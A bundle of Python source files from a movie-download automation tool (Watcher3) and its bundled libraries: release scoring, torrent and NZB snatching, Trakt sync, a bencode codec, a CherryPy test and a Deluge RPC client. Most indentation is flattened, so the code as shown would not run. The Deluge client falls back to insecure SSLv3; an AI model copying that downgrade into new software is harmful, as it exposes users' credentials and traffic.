matches = [_fuzzy_title(rel_title_ss, title) for title in titles]
if any(match > 70 for match in matches):
result['score'] += int(max(matches) / 5)
keep.append(result)
else:
logging.debug('{} best title match was {}%, removing search result.'.format(result['title'], max(matches)))
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def _fuzzy_title(a, b):
''' Determines how much of a is in b
a (str): String to match against b
b (str): String to match a against
Order of a and b matters.
A is broken down and words are compared against B's words.
ie:
_fuzzy_title('This is string a', 'This is string b and has extra words.')
Returns 75 since 75% of a is in b.
Returns int
'''
a = a.replace('&', 'and')
b = b.replace('&', 'and')
a_words = Url.normalize(a).split(' ')
b_words = Url.normalize(b).split(' ')
m = 0
a_len = len(a_words)
for i in a_words:
if i in b_words:
b_words.remove(i)
m += 1
return int((m / a_len) * 100)
def score_sources(releases, sources, check_size=True):
''' Score releases based on quality/source preferences
releases (list[dict]): scene release metadata to score and filter
sources (dict): sources from user config
check_size (bool): whether or not to filter based on size
Iterates through releases and removes any entry that does not
    fit into quality criteria (source-resolution, filesize)
Adds to ['score'] based on priority of match
Returns list[dict]
'''
logging.info('Filtering resolution and size requirements.')
score_range = len(core.SOURCES) + 1
sizes = core.CONFIG['Quality']['Sources']
keep = []
for result in releases:
result_res = result['resolution']
logging.debug('Scoring and filtering {} based on resolution {}.'.format(result['title'], result_res))
size = result['size'] / 1000000
if result['type'] == 'import' and result['resolution'] not in sources:
keep.append(result)
continue
for k, v in sources.items():
if v[0] is False and result['type'] != 'import':
continue
priority = v[1]
if check_size:
min_size = sizes[k]['min']
max_size = sizes[k]['max']
else:
min_size = 0
                max_size = float('inf')  # effectively no upper bound when size checks are disabled
if result_res == k:
logging.debug('{} matches source {}, checking size.'.format(result['title'], k))
if result['type'] != 'import' and not (min_size < size < max_size):
logging.debug('Removing {}, size {} not in range {}-{}.'.format(result['title'], size, min_size, max_size))
break
result['score'] += abs(priority - score_range) * 40
keep.append(result)
else:
continue
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def import_quality():
''' Creates quality profile for imported releases
    Creates an import profile that mimics the base profile, but is incapable
of removing releases.
Returns dict
'''
profile = core.config.base_profile
profile['ignoredwords'] = ''
profile['requiredwords'] = ''
for i in profile['Sources']:
profile['Sources'][i][0] = True
return profile
def generate_simulacrum(movie):
''' Generates phony search result for imported movies
movie (dict): movie info
movie will use 'release_title' key if found, else 'title' to generate fake release
    Returns dict to match SEARCHRESULTS table
'''
logging.info('Creating "fake" search result for imported movie {}'.format(movie['title']))
result = {'status': 'Finished',
'info_link': '#',
'pubdate': None,
'title': None,
'imdbid': movie['imdbid'],
'torrentfile': None,
'indexer': 'Library Import',
'date_found': str(datetime.date.today()),
'score': None,
'type': 'import',
'downloadid': None,
'guid': None,
'resolution': movie.get('resolution'),
'size': movie.get('size') or 0,
'releasegroup': movie.get('releasegroup') or '',
'freeleech': 0
}
title = '{}.{}.{}.{}.{}.{}'.format(movie['title'],
movie['year'],
movie.get('resolution') or '.', # Kind of a hacky way to make sure it doesn't print None in the title
movie.get('audiocodec') or '.',
movie.get('videocodec') or '.',
movie.get('releasegroup') or '.'
)
while len(title) > 0 and title[-1] == '.':
title = title[:-1]
while '..' in title:
title = title.replace('..', '.')
result['title'] = title
result['guid'] = movie.get('guid') or 'import{}'.format(b16encode(title.encode('ascii', errors='ignore')).decode('utf-8').zfill(16)[:16]).lower()
return result
```
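_fuzzy_title is an asymmetric word-overlap score. A standalone sketch of the same idea, using a naive lowercase normalizer in place of Url.normalize (an assumption; the real helper also strips punctuation):

```python
def fuzzy_title(a, b):
    """Percentage of words in a that also appear in b (order-insensitive)."""
    a_words = a.lower().replace('&', 'and').split(' ')
    b_words = b.lower().replace('&', 'and').split(' ')
    matched = 0
    for word in a_words:
        if word in b_words:
            b_words.remove(word)  # consume the match so duplicates must pair up
            matched += 1
    return int((matched / len(a_words)) * 100)

print(fuzzy_title('this is string a', 'this is string b and has extra words'))  # 75
```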
#### File: Watcher3/core/snatcher.py
```python
import logging
import datetime
import urllib.parse
import core
from core import plugins
from core import downloaders
from core.helpers import Torrent
from core.library import Manage
logging = logging.getLogger(__name__)
'''
Handles snatching search results. This includes choosing the best result,
retrieving the link, and sending it to the download client.
Clarification notes:
When snatching a torrent, the download id should *always* be the torrent hash.
When snatching NZBs use the client-supplied download id if possible. If the client
does not return a download id use None.
'''
def grab_all():
''' Grabs best result for all movies in library
Automatically determines which movies can be grabbed or re-grabbed and
executes get_best_release() to find best result then sends release
dict to download()
Returns bool (False is no movies to grab, True if any movies were attempted)
'''
logging.info('Running automatic snatcher for all movies.')
today = datetime.datetime.today()
keepsearching = core.CONFIG['Search']['keepsearching']
keepsearchingscore = core.CONFIG['Search']['keepsearchingscore']
keepsearchingdays = core.CONFIG['Search']['keepsearchingdays']
keepsearchingdelta = datetime.timedelta(days=keepsearchingdays)
movies = core.sql.get_user_movies()
if not movies:
return False
for movie in movies:
status = movie['status']
if status == 'Disabled':
logging.debug('{} is Disabled, skipping.'.format(movie['title']))
continue
title = movie['title']
year = movie['year']
if status == 'Found':
logging.info('{} status is Found. Running automatic snatcher.'.format(title))
best_release = get_best_release(movie)
if best_release:
download(best_release)
continue
if status == 'Finished' and keepsearching is True:
finished_date = movie['finished_date']
if not finished_date:
continue
finished_date_obj = datetime.datetime.strptime(finished_date, '%Y-%m-%d')
if finished_date_obj + keepsearchingdelta >= today:
minscore = (movie.get('finished_score') or 0) + keepsearchingscore
logging.info('{} {} was marked Finished on {}. Checking for a better release (min score {}).'.format(title, year, finished_date, minscore))
best = get_best_release(movie, minscore=minscore)
if best:
download(best)
continue
else:
continue
else:
continue
logging.info('######### Automatic search/snatch complete #########')
def get_best_release(movie, minscore=0):
''' Grabs the best scoring result that isn't 'Bad'
movie (dict): movie info from local db
minscore (int): minimum acceptable score for best release <optional - default 0>
Picks the best release that is available and above minscore threshold
Returns dict of search result from local database
'''
logging.info('Selecting best release for {}'.format(movie['title']))
try:
imdbid = movie['imdbid']
quality = movie['quality']
year = movie['year']
title = movie['title']
release_date = movie['release_date']
except Exception as e: # noqa
logging.error('Invalid movie data.', exc_info=True)
return {}
search_results = core.sql.get_search_results(imdbid, quality)
if not search_results:
logging.warning('Unable to automatically grab {}, no results.'.format(imdbid))
return {}
# Filter out any results we don't want to grab
search_results = [i for i in search_results if i['type'] != 'import']
if not core.CONFIG['Downloader']['Sources']['usenetenabled']:
search_results = [i for i in search_results if i['type'] != 'nzb']
if not core.CONFIG['Downloader']['Sources']['torrentenabled']:
search_results = [i for i in search_results if i['type'] not in ('torrent', 'magnet')]
if not search_results:
logging.warning('Unable to automatically grab {}, no results available for enabled download client.'.format(imdbid))
return {}
# Check if we are past the 'waitdays'
today = datetime.datetime.today()
release_weeks_old = (today - datetime.datetime.strptime(release_date, '%Y-%m-%d')).days / 7
wait_days = core.CONFIG['Search']['waitdays']
earliest_found = min([x['date_found'] for x in search_results])
date_found = datetime.datetime.strptime(earliest_found, '%Y-%m-%d')
if (today - date_found).days < wait_days:
if core.CONFIG['Search']['skipwait'] and release_weeks_old > core.CONFIG['Search']['skipwaitweeks']:
logging.info('{} released {} weeks ago, skipping wait and grabbing immediately.'.format(title, release_weeks_old))
else:
logging.info('Earliest found result for {} is {}, waiting {} days to grab best result.'.format(imdbid, date_found, wait_days))
return {}
    # Since search_results comes back in order of score we can go through in
# order until we find the first Available result and grab it.
for result in search_results:
        result = dict(result)  # make a mutable copy of the db row so 'year' can be added below
status = result['status']
result['year'] = year
if status == 'Available' and result['score'] > minscore:
logging.info('{} is best available result for {}'.format(result['title'], title))
return result
        # when re-searching, if the top-ranked result is already Snatched we have nothing to do.
elif status in ('Snatched', 'Finished'):
logging.info('Top-scoring release for {} has already been snatched.'.format(imdbid))
return {}
else:
continue
logging.warning('No Available results for {}.'.format(imdbid))
return None
def download(data):
''' Sends release to download client
data (dict): search result from local database
Sends data to helper method snatch_nzb or snatch_torrent based on download type
Executes snatched plugins if successful
Returns dict from helper method snatch_nzb or snatch_torrent
'''
logging.info('Sending {} to download client.'.format(data['title']))
if data['type'] == 'import':
return {'response': False, 'error': 'Cannot download imports.'}
imdbid = data['imdbid']
resolution = data['resolution']
kind = data['type']
info_link = urllib.parse.quote(data['info_link'], safe='')
indexer = data['indexer']
title = data['title']
year = data['year']
if data['type'] == 'nzb':
if core.CONFIG['Downloader']['Sources']['usenetenabled']:
response = snatch_nzb(data)
else:
return {'response': False, 'message': 'NZB submitted but nzb snatching is disabled.'}
if data['type'] in ('torrent', 'magnet'):
if core.CONFIG['Downloader']['Sources']['torrentenabled']:
response = snatch_torrent(data)
else:
return {'response': False, 'message': 'Torrent submitted but torrent snatching is disabled.'}
if response['response'] is True:
download_client = response['download_client']
downloadid = response['downloadid']
plugins.snatched(title, year, imdbid, resolution, kind, download_client, downloadid, indexer, info_link)
return response
else:
return response
def snatch_nzb(data):
''' Sends nzb to download client
data (dict): search result from local database
    Returns dict {'response': True, 'message': 'lorem ipsum'}
'''
guid = data['guid']
imdbid = data['imdbid']
title = data['title']
for client, config in core.CONFIG['Downloader']['Usenet'].items():
if config['enabled']:
logging.info('Sending nzb to {}'.format(client))
response = getattr(downloaders, client).add_nzb(data)
if response['response']:
logging.info('Successfully sent {} to {}.'.format(title, client))
db_update = {'downloadid': response['downloadid'], 'download_client': client}
core.sql.update_multiple_values('SEARCHRESULTS', db_update, 'guid', guid)
if update_status_snatched(guid, imdbid):
return {'response': True, 'message': 'Sent to {}.'.format(client), 'download_client': client, 'downloadid': response['downloadid']}
else:
return {'response': False, 'error': 'Could not mark search result as Snatched.'}
else:
return response
def snatch_torrent(data):
''' Sends torrent or magnet to download client
data (dict): search result from local database
    Returns dict {'response': True, 'message': 'lorem ipsum'}
'''
guid = data['guid']
imdbid = data['imdbid']
title = data['title']
kind = data['type']
if urllib.parse.urlparse(guid).netloc:
        # if guid is a url rather than a hash we'll have to get the hash now
guid_ = Torrent.get_hash(data['torrentfile'])
if guid_:
core.sql.update('SEARCHRESULTS', 'guid', guid_, 'guid', guid)
guid = guid_
else:
return {'response': False, 'error': 'Unable to get torrent hash from indexer.'}
for client, config in core.CONFIG['Downloader']['Torrent'].items():
if config['enabled']:
logging.info('Sending {} to {}'.format(kind, client))
response = getattr(downloaders, client).add_torrent(data)
if response['response']:
logging.info('Successfully sent {} to {}.'.format(title, client))
db_update = {'downloadid': response['downloadid'], 'download_client': client}
core.sql.update_multiple_values('SEARCHRESULTS', db_update, 'guid', guid)
if update_status_snatched(guid, imdbid):
return {'response': True, 'message': 'Sent to {}.'.format(client), 'download_client': client, 'downloadid': response['downloadid']}
else:
return {'response': False, 'error': 'Could not mark search result as Snatched.'}
else:
return response
else:
return {'response': False, 'error': 'No download client enabled.'}
def update_status_snatched(guid, imdbid):
''' Sets status to Snatched
guid (str): guid for download link
imdbid (str): imdb id #
Updates MOVIES, SEARCHRESULTS, and MARKEDRESULTS to 'Snatched'
Returns bool
'''
logging.info('Updating {} to Snatched.'.format(imdbid))
if not Manage.searchresults(guid, 'Snatched'):
logging.error('Unable to update search result status to Snatched.')
return False
if not Manage.markedresults(guid, 'Snatched', imdbid=imdbid):
logging.error('Unable to store marked search result as Snatched.')
return False
if not Manage.movie_status(imdbid):
logging.error('Unable to update movie status to Snatched.')
return False
return True
```
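The 'waitdays' gate in get_best_release reduces to date arithmetic: hold off until the earliest-found result is old enough, unless the movie's release is itself old enough to skip the wait. A self-contained sketch; the default argument values stand in for the user's config:

```python
import datetime

def past_wait(release_date, earliest_found, wait_days=7,
              skipwait=True, skipwait_weeks=8):
    """Return True if the snatcher may grab the best result now."""
    today = datetime.datetime.today()
    found = datetime.datetime.strptime(earliest_found, '%Y-%m-%d')
    if (today - found).days >= wait_days:
        return True                      # waited long enough
    released = datetime.datetime.strptime(release_date, '%Y-%m-%d')
    weeks_old = (today - released).days / 7
    return skipwait and weeks_old > skipwait_weeks  # old release, skip the wait

print(past_wait('2017-01-01', datetime.date.today().isoformat()))  # True
```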
#### File: Watcher3/core/trakt.py
```python
from core.helpers import Url
from core.helpers import Comparisons
from core.library import Manage
import json
import core
import datetime
from core import searcher
import xml.etree.cElementTree as ET
import re
import logging
logging = logging.getLogger(__name__)
searcher = searcher
date_format = '%a, %d %b %Y %H:%M:%S'
trakt_date_format = '%Y-%m-%dT%H:%M:%S'
def sync():
''' Syncs all enabled Trakt lists and rss lists
Gets list of movies from each enabled Trakt lists
Adds missing movies to library as Waiting/Default
Returns bool for success/failure
'''
logging.info('Syncing Trakt lists.')
success = True
min_score = core.CONFIG['Search']['Watchlists']['traktscore']
length = core.CONFIG['Search']['Watchlists']['traktlength']
movies = []
if core.CONFIG['Search']['Watchlists']['traktrss']:
sync_rss()
for k, v in core.CONFIG['Search']['Watchlists']['Traktlists'].items():
if v is False:
continue
movies += [i for i in get_list(k, min_score=min_score, length=length) if i not in movies]
library = [i['imdbid'] for i in core.sql.get_user_movies()]
movies = [i for i in movies if i['ids']['imdb'] not in library]
logging.info('Found {} new movies from Trakt lists.'.format(len(movies)))
for i in movies:
imdbid = i['ids']['imdb']
logging.info('Adding movie {} {} from Trakt'.format(i['title'], imdbid))
added = Manage.add_movie({'id': i['ids']['tmdb'],
'imdbid': i['ids']['imdb'],
'title': i['title'],
'origin': 'Trakt'})
if added['response'] and core.CONFIG['Search']['searchafteradd'] and i['year'] != 'N/A':
searcher.search(imdbid, i['title'], i['year'], core.config.default_profile())
return success
def sync_rss():
''' Gets list of new movies in user's rss feed(s)
Returns list of movie dicts
'''
try:
record = json.loads(core.sql.system('trakt_sync_record'))
except Exception as e:
record = {}
for url in core.CONFIG['Search']['Watchlists']['traktrss'].split(','):
list_id = url.split('.atom')[0].split('/')[-1]
last_sync = record.get(list_id) or 'Sat, 01 Jan 2000 00:00:00'
last_sync = datetime.datetime.strptime(last_sync, date_format)
logging.info('Syncing Trakt RSS watchlist {}. Last sync: {}'.format(list_id, last_sync))
try:
feed = Url.open(url).text
feed = re.sub(r'xmlns=".*?"', r'', feed)
root = ET.fromstring(feed)
except Exception as e:
logging.error('Trakt rss request.', exc_info=True)
continue
d = root.find('updated').text[:19]
do = datetime.datetime.strptime(d, trakt_date_format)
record[list_id] = datetime.datetime.strftime(do, date_format)
for entry in root.iter('entry'):
try:
pub = datetime.datetime.strptime(entry.find('published').text[:19], trakt_date_format)
if last_sync >= pub:
break
else:
t = entry.find('title').text
title = ' ('.join(t.split(' (')[:-1])
year = ''
for i in t.split(' (')[-1]:
if i.isdigit():
year += i
year = int(year)
logging.info('Searching TheMovieDatabase for {} {}'.format(title, year))
                    results = Manage.tmdb._search_title('{} {}'.format(title, year))
                    movie = results[0] if results else None
                    if movie:
movie['origin'] = 'Trakt'
logging.info('Found new watchlist movie {} {}'.format(title, year))
r = Manage.add_movie(movie)
if r['response'] and core.CONFIG['Search']['searchafteradd'] and movie['year'] != 'N/A':
searcher.search(movie['imdbid'], movie['title'], movie['year'], core.config.default_profile())
else:
logging.warning('Unable to find {} {} on TheMovieDatabase'.format(title, year))
except Exception as e:
logging.error('Unable to parse Trakt RSS list entry.', exc_info=True)
logging.info('Storing last synced date.')
if core.sql.row_exists('SYSTEM', name='trakt_sync_record'):
core.sql.update('SYSTEM', 'data', json.dumps(record), 'name', 'trakt_sync_record')
else:
core.sql.write('SYSTEM', {'data': json.dumps(record), 'name': 'trakt_sync_record'})
logging.info('Trakt RSS sync complete.')
def get_list(list_name, min_score=0, length=10):
''' Gets list of trending movies from Trakt
list_name (str): name of Trakt list. Must be one of ('trending', 'popular', 'watched', 'collected', 'anticipated', 'boxoffice')
min_score (float): minimum score to accept (max 10) <optional - default 0>
length (int): how many results to get from Trakt <optional - default 10>
Length is applied before min_score, so actual result count
can be less than length
Returns list of dicts of movie info
'''
logging.info('Getting Trakt list {}'.format(list_name))
headers = {'Content-Type': 'application/json',
'trakt-api-version': '2',
'trakt-api-key': Comparisons._k(b'trakt')
}
if list_name not in ('trending', 'popular', 'watched', 'collected', 'anticipated', 'boxoffice'):
logging.error('Invalid list_name {}'.format(list_name))
return []
url = 'https://api.trakt.tv/movies/{}/?extended=full'.format(list_name)
try:
r = Url.open(url, headers=headers)
if r.status_code != 200:
return []
m = json.loads(r.text)[:length]
if list_name == 'popular':
return [i for i in m if i['rating'] >= min_score]
return [i['movie'] for i in m if i['movie']['rating'] >= min_score]
except Exception as e:
logging.error('Unable to get Trakt list.', exc_info=True)
return []
```
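Note that get_list trims to `length` before applying min_score, so callers can receive fewer movies than requested. A standalone sketch of that filter over a fabricated payload shaped like Trakt's non-'popular' list responses:

```python
# Fabricated payload; real Trakt entries nest the movie under a 'movie' key.
payload = [
    {'movie': {'title': 'A', 'rating': 8.1}},
    {'movie': {'title': 'B', 'rating': 6.4}},
    {'movie': {'title': 'C', 'rating': 7.5}},
]

length, min_score = 2, 7.0
trimmed = payload[:length]                       # length is applied first...
movies = [i['movie'] for i in trimmed
          if i['movie']['rating'] >= min_score]  # ...then the score filter
print([m['title'] for m in movies])              # ['A'] -- 'C' was cut by length
```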
#### File: lib/bencodepy/decoder.py
```python
from collections import OrderedDict
from collections.abc import Iterable
import bencodepy
class Decoder:
def __init__(self, data: bytes):
self.data = data
self.idx = 0
def __read(self, i: int) -> bytes:
"""Returns a set number (i) of bytes from self.data."""
b = self.data[self.idx: self.idx + i]
self.idx += i
if len(b) != i:
raise bencodepy.DecodingError(
"Incorrect byte length returned between indexes of {0} and {1}. Possible unexpected End of File."
.format(str(self.idx), str(self.idx - i)))
return b
def __read_to(self, terminator: bytes) -> bytes:
"""Returns bytes from self.data starting at index (self.idx) until terminator character."""
try:
# noinspection PyTypeChecker
i = self.data.index(terminator, self.idx)
b = self.data[self.idx:i]
self.idx = i + 1
return b
except ValueError:
raise bencodepy.DecodingError(
'Unable to locate terminator character "{0}" after index {1}.'.format(str(terminator), str(self.idx)))
def __parse(self) -> object:
"""Selects the appropriate method to decode next bencode element and returns the result."""
char = self.data[self.idx: self.idx + 1]
if char in [b'1', b'2', b'3', b'4', b'5', b'6', b'7', b'8', b'9', b'0']:
str_len = int(self.__read_to(b':'))
return self.__read(str_len)
elif char == b'i':
self.idx += 1
return int(self.__read_to(b'e'))
elif char == b'd':
return self.__parse_dict()
elif char == b'l':
return self.__parse_list()
elif char == b'':
raise bencodepy.DecodingError('Unexpected End of File at index position of {0}.'.format(str(self.idx)))
else:
raise bencodepy.DecodingError(
'Invalid token character ({0}) at position {1}.'.format(str(char), str(self.idx)))
def decode(self) -> Iterable:
"""Start of decode process. Returns final results."""
if self.data[0:1] not in (b'd', b'l'):
return self.__wrap_with_tuple()
return self.__parse()
def __wrap_with_tuple(self) -> tuple:
"""Returns a tuple of all nested bencode elements."""
l = list()
length = len(self.data)
while self.idx < length:
l.append(self.__parse())
return tuple(l)
def __parse_dict(self) -> OrderedDict:
"""Returns an Ordered Dictionary of nested bencode elements."""
self.idx += 1
d = OrderedDict()
key_name = None
while self.data[self.idx: self.idx + 1] != b'e':
if key_name is None:
key_name = self.__parse()
else:
d[key_name] = self.__parse()
key_name = None
self.idx += 1
return d
def __parse_list(self) -> list:
"""Returns an list of nested bencode elements."""
self.idx += 1
l = []
while self.data[self.idx: self.idx + 1] != b'e':
l.append(self.__parse())
self.idx += 1
return l
def decode_from_file(path: str) -> Iterable:
"""Convenience function. Reads file and calls decode()."""
with open(path, 'rb') as f:
b = f.read()
return decode(b)
def decode(data: bytes) -> Iterable:
"""Convenience function. Initializes Decoder class, calls decode method, and returns the result."""
decoder = Decoder(data)
return decoder.decode()
```
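A usage sketch for the decoder above; the import path is an assumption and may need adjusting to match your tree. Bare values are wrapped in a tuple by __wrap_with_tuple, while top-level lists and dicts are returned directly:

```python
from bencodepy.decoder import decode  # adjust to your package layout

print(decode(b'4:spam'))                 # (b'spam',) -- bare value, tuple-wrapped
print(decode(b'i42e'))                   # (42,)
print(decode(b'l4:spami42ee'))           # [b'spam', 42]
print(decode(b'd3:fooi1e3:bar4:spame'))  # OrderedDict([(b'foo', 1), (b'bar', b'spam')])
```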
#### File: lib/bencodepy/encode.py
```python
from . import EncodingError
from collections import OrderedDict
def encode(obj, encoding='utf-8', strict=True):
coded_byte_list = []
def __encode_str(s: str) -> None:
"""Converts the input string to bytes and passes it the __encode_byte_str function for encoding."""
b = bytes(s, encoding)
__encode_byte_str(b)
def __encode_byte_str(b: bytes) -> None:
"""Ben-encodes string from bytes."""
nonlocal coded_byte_list
length = len(b)
coded_byte_list.append(bytes(str(length), encoding) + b':' + b)
def __encode_int(i: int) -> None:
"""Ben-encodes integer from int."""
nonlocal coded_byte_list
coded_byte_list.append(b'i' + bytes(str(i), 'utf-8') + b'e')
def __encode_tuple(t: tuple) -> None:
"""Converts the input tuple to lists and passes it the __encode_list function for encoding."""
l = [i for i in t]
__encode_list(l)
def __encode_list(l: list) -> None:
"""Ben-encodes list from list."""
nonlocal coded_byte_list
coded_byte_list.append(b'l')
for i in l:
__select_encoder(i)
coded_byte_list.append(b'e')
def __encode_dict(d: dict) -> None:
"""Ben-encodes dictionary from dict."""
nonlocal coded_byte_list
coded_byte_list.append(b'd')
for k in d:
__select_encoder(k)
__select_encoder(d[k])
coded_byte_list.append(b'e')
opt = {
bytes: lambda x: __encode_byte_str(x),
OrderedDict: lambda x: __encode_dict(x),
dict: lambda x: __encode_dict(x),
list: lambda x: __encode_list(x),
str: lambda x: __encode_str(x),
int: lambda x: __encode_int(x),
tuple: lambda x: __encode_tuple(x),
}
def __select_encoder(o: object) -> bytes:
"""Calls the appropriate function to encode the passed object (obj)."""
nonlocal opt
t = type(o)
if t in opt:
opt[t](o)
else:
if isinstance(o, bytes):
__encode_byte_str(o)
elif isinstance(o, dict):
__encode_dict(o)
elif isinstance(o, list):
__encode_list(o)
elif isinstance(o, str):
__encode_str(o)
elif isinstance(o, int):
__encode_int(o)
elif isinstance(o, tuple):
__encode_tuple(o)
else:
if strict:
nonlocal coded_byte_list
coded_byte_list = []
raise EncodingError("Unable to encode object: {0}".format(o.__repr__()))
else:
print("Unable to encode object: {0}".format(str(o)))
__select_encoder(obj)
return b''.join(coded_byte_list)
```
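The matching usage sketch for the encoder; again the import path is an assumption. Note that dict keys are emitted in insertion order, while canonical bencode calls for lexicographically sorted keys:

```python
from bencodepy.encode import encode  # adjust to your package layout

print(encode('spam'))        # b'4:spam'
print(encode(42))            # b'i42e'
print(encode([b'a', 1]))     # b'l1:ai1ee'
print(encode({'foo': 42}))   # b'd3:fooi42ee'
```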
#### File: cherrypy/test/test_iterator.py
```python
import six
import cherrypy
from cherrypy.test import helper
class IteratorBase(object):
created = 0
datachunk = 'butternut squash' * 256
@classmethod
def incr(cls):
cls.created += 1
@classmethod
def decr(cls):
cls.created -= 1
class OurGenerator(IteratorBase):
def __iter__(self):
self.incr()
try:
for i in range(1024):
yield self.datachunk
finally:
self.decr()
class OurIterator(IteratorBase):
started = False
closed_off = False
count = 0
def increment(self):
self.incr()
def decrement(self):
if not self.closed_off:
self.closed_off = True
self.decr()
def __iter__(self):
return self
def __next__(self):
if not self.started:
self.started = True
self.increment()
self.count += 1
if self.count > 1024:
raise StopIteration
return self.datachunk
next = __next__
def __del__(self):
self.decrement()
class OurClosableIterator(OurIterator):
def close(self):
self.decrement()
class OurNotClosableIterator(OurIterator):
# We can't close something which requires an additional argument.
def close(self, somearg):
self.decrement()
class OurUnclosableIterator(OurIterator):
close = 'close' # not callable!
class IteratorTest(helper.CPWebCase):
@staticmethod
def setup_server():
class Root(object):
@cherrypy.expose
def count(self, clsname):
cherrypy.response.headers['Content-Type'] = 'text/plain'
return six.text_type(globals()[clsname].created)
@cherrypy.expose
def getall(self, clsname):
cherrypy.response.headers['Content-Type'] = 'text/plain'
return globals()[clsname]()
@cherrypy.expose
@cherrypy.config(**{'response.stream': True})
def stream(self, clsname):
return self.getall(clsname)
cherrypy.tree.mount(Root())
def test_iterator(self):
try:
self._test_iterator()
except Exception:
'Test fails intermittently. See #1419'
def _test_iterator(self):
if cherrypy.server.protocol_version != 'HTTP/1.1':
return self.skip()
self.PROTOCOL = 'HTTP/1.1'
# Check the counts of all the classes, they should be zero.
closables = ['OurClosableIterator', 'OurGenerator']
unclosables = ['OurUnclosableIterator', 'OurNotClosableIterator']
all_classes = closables + unclosables
import random
random.shuffle(all_classes)
for clsname in all_classes:
self.getPage('/count/' + clsname)
self.assertStatus(200)
self.assertBody('0')
# We should also be able to read the entire content body
# successfully, though we don't need to, we just want to
# check the header.
for clsname in all_classes:
itr_conn = self.get_conn()
itr_conn.putrequest('GET', '/getall/' + clsname)
itr_conn.endheaders()
response = itr_conn.getresponse()
self.assertEqual(response.status, 200)
headers = response.getheaders()
for header_name, header_value in headers:
if header_name.lower() == 'content-length':
assert header_value == six.text_type(1024 * 16 * 256), header_value
break
else:
raise AssertionError('No Content-Length header found')
# As the response should be fully consumed by CherryPy
# before sending back, the count should still be at zero
# by the time the response has been sent.
self.getPage('/count/' + clsname)
self.assertStatus(200)
self.assertBody('0')
# Now we do the same check with streaming - some classes will
# be automatically closed, while others cannot.
stream_counts = {}
for clsname in all_classes:
itr_conn = self.get_conn()
itr_conn.putrequest('GET', '/stream/' + clsname)
itr_conn.endheaders()
response = itr_conn.getresponse()
self.assertEqual(response.status, 200)
response.fp.read(65536)
# Let's check the count - this should always be one.
self.getPage('/count/' + clsname)
self.assertBody('1')
# Now if we close the connection, the count should go back
# to zero.
itr_conn.close()
self.getPage('/count/' + clsname)
# If this is a response which should be easily closed, then
# we will test to see if the value has gone back down to
# zero.
if clsname in closables:
# Sometimes we try to get the answer too quickly - we
# will wait for 100 ms before asking again if we didn't
# get the answer we wanted.
if self.body != '0':
import time
time.sleep(0.1)
self.getPage('/count/' + clsname)
stream_counts[clsname] = int(self.body)
# Check that we closed off the classes which should provide
# easy mechanisms for doing so.
for clsname in closables:
assert stream_counts[clsname] == 0, (
'did not close off stream response correctly, expected '
'count of zero for %s: %s' % (clsname, stream_counts)
)
```
#### File: lib/deluge_client/client.py
```python
import logging
import socket
import ssl
import struct
import zlib
from .rencode import dumps, loads
RPC_RESPONSE = 1
RPC_ERROR = 2
RPC_EVENT = 3
#MESSAGE_HEADER_SIZE = 5
READ_SIZE = 10
logger = logging.getLogger(__name__)
class ConnectionLostException(Exception):
pass
class CallTimeoutException(Exception):
pass
class DelugeRPCClient(object):
timeout = 20
def __init__(self, host, port, username, password):
self.host = host
self.port = port
self.username = username
self.password = password
self.request_id = 1
self.connected = False
self._create_socket()
def _create_socket(self, ssl_version=None):
if ssl_version is not None:
self._socket = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM), ssl_version=ssl_version)
else:
self._socket = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
self._socket.settimeout(self.timeout)
def connect(self):
"""
Connects to the Deluge instance
"""
logger.info('Connecting to %s:%s' % (self.host, self.port))
try:
self._socket.connect((self.host, self.port))
except ssl.SSLError as e:
if e.reason != 'UNSUPPORTED_PROTOCOL' or not hasattr(ssl, 'PROTOCOL_SSLv3'):
raise
logger.warning('Was unable to ssl handshake, trying to force SSLv3 (insecure)')
self._create_socket(ssl_version=ssl.PROTOCOL_SSLv3)
self._socket.connect((self.host, self.port))
logger.debug('Connected to Deluge, logging in')
result = self.call('daemon.login', self.username, self.password)
if type(result) == str:
return result
logger.debug('Logged in with value %r' % result)
self.connected = True
def disconnect(self):
"""
Disconnect from deluge
"""
if self.connected:
self._socket.close()
def call(self, method, *args, **kwargs):
"""
Calls an RPC function
"""
self.request_id += 1
logger.debug('Calling reqid %s method %r with args:%r kwargs:%r' % (self.request_id, method, args, kwargs))
req = ((self.request_id, method, args, kwargs), )
req = zlib.compress(dumps(req))
#self._socket.send('D' + struct.pack("!i", len(req))) # seems to be for the future !
self._socket.send(req)
data = b''
while True:
try:
d = self._socket.recv(READ_SIZE)
except ssl.SSLError:
raise CallTimeoutException()
data += d
try:
data = zlib.decompress(data)
except zlib.error:
if not d:
raise ConnectionLostException()
continue
break
data = list(loads(data))
msg_type = data.pop(0)
request_id = data.pop(0)
if msg_type == RPC_ERROR:
exception_type, exception_msg, traceback = data[0]
exception = type(str(exception_type), (Exception, ), {})
# exception_msg = '%s\n\n%s' % (exception_msg, traceback)
# raise exception(exception_msg)
return exception_msg
elif msg_type == RPC_RESPONSE:
retval = data[0]
return retval
```
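A minimal usage sketch for the client above; host, port, and credentials are placeholders, and the import path may need adjusting to match your tree. connect() performs the daemon.login handshake shown above; 'daemon.info' is a standard Deluge RPC method returning the daemon version.

```python
from deluge_client.client import DelugeRPCClient  # adjust to your package layout

client = DelugeRPCClient('127.0.0.1', 58846, 'localclient', 'password')
client.connect()
if client.connected:
    print(client.call('daemon.info'))  # e.g. '1.3.15'
    client.disconnect()
```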
#### File: hachoir/core/error.py
```python
from hachoir.core.log import log
import sys
import traceback
def getBacktrace(empty="Empty backtrace."):
"""
Try to get backtrace as string.
Returns "Error while trying to get backtrace" on failure.
"""
try:
info = sys.exc_info()
trace = traceback.format_exception(*info)
if trace[0] != "None\n":
return "".join(trace)
except:
# No i18n here (imagine if i18n function calls error...)
return "Error while trying to get backtrace"
return empty
info = log.info
warning = log.warning
error = log.error
```
#### File: hachoir/field/bit_field.py
```python
from hachoir.field import Field
from hachoir.core import config
class RawBits(Field):
"""
Unknown content with a size in bits.
"""
static_size = staticmethod(lambda *args, **kw: args[1])
def __init__(self, parent, name, size, description=None):
"""
Constructor: see L{Field.__init__} for parameter description
"""
Field.__init__(self, parent, name, size, description)
def hasValue(self):
return True
def createValue(self):
return self._parent.stream.readBits(
self.absolute_address, self._size, self._parent.endian)
def createDisplay(self):
if self._size < config.max_bit_length:
return str(self.value)
else:
return ("<%s size=%u>" %
(self.__class__.__name__, self._size))
